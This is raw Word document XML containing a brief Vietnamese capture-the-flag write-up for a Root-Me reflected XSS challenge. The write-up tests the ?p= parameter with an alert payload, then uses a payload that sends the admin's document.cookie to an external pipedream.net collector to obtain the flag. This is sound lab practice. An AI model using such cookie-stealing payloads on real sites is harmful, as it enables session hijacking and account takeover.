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7746" w14:textId="1829F41D" w:rsidR="008B3901" w:rsidRDefault="008B3901">
      <w:r>
        <w:t>Đầu tiên kiểm tra thì thấy thông tin trường ?p= không an toàn, có thể truyền payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FAD491" w14:textId="01B97AC6" w:rsidR="008B3901" w:rsidRDefault="008B3901">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0C23F9" wp14:editId="12845081">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17788139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398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A4F8" w14:textId="1F661737" w:rsidR="008B3901" w:rsidRDefault="008B3901">
      <w:r>
        <w:t>Thử chèn payload tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25680CAF" w14:textId="24C85E11" w:rsidR="008B3901" w:rsidRDefault="008B3901">
      <w:r w:rsidRPr="008B3901">
        <w:t>http://challenge01.root-me.org/web-client/ch26/?p=tmp%27%20onmouseover=%27alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC61CB" w14:textId="2A95530E" w:rsidR="000B7AF7" w:rsidRDefault="008B3901">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3B3AFC" wp14:editId="5DE78BE3">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="100901855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18553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FD3F" w14:textId="68A8B463" w:rsidR="00C8190E" w:rsidRDefault="00C8190E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00380844">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          </w:rPr>
          <w:t>http://challenge01.root-me.org/web-client/ch26/?p=tmp%27%20onmouseover=%27document.location=%22https://eon5wu9esj2rcgn.m.pipedream.net?%22.concat(document.cookie)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D1B5ED3" w14:textId="6F008227" w:rsidR="00C8190E" w:rsidRDefault="00C8190E">
      <w:r>
        <w:t>Gửi payload và nhấn report to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D1EBD" w14:textId="5D52D0A6" w:rsidR="008B3901" w:rsidRDefault="00C8190E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BD5B1EA" wp14:editId="3E083E82">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="93302931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29318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E1E9" w14:textId="7FA66FBF" w:rsidR="00C8190E" w:rsidRDefault="00C8190E">
      <w:r>
        <w:t>Ta có được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A3C00" w14:textId="6E16F859" w:rsidR="008B3901" w:rsidRDefault="00C8190E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024266D2" wp14:editId="79657CD5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="23354287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42873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7862" w14:textId="77777777" w:rsidR="008B3901" w:rsidRDefault="008B3901"/>
    <w:sectPr w:rsidR="008B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00"/>
    <w:rsid w:val="000B7AF7"/>
    <w:rsid w:val="00237F3F"/>
    <w:rsid w:val="008B3901"/>
    <w:rsid w:val="00C8190E"/>
    <w:rsid w:val="00CF2000"/>
    <w:rsid w:val="00DD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27B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A7588472-4F2D-4AE0-907A-28496FED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allenge01.root-me.org/web-client/ch26/?p=tmp%27%20onmouseover=%27document.location=%22https://eon5wu9esj2rcgn.m.pipedream.net?%22.concat(document.cookie)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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-06T08:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-06T10:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>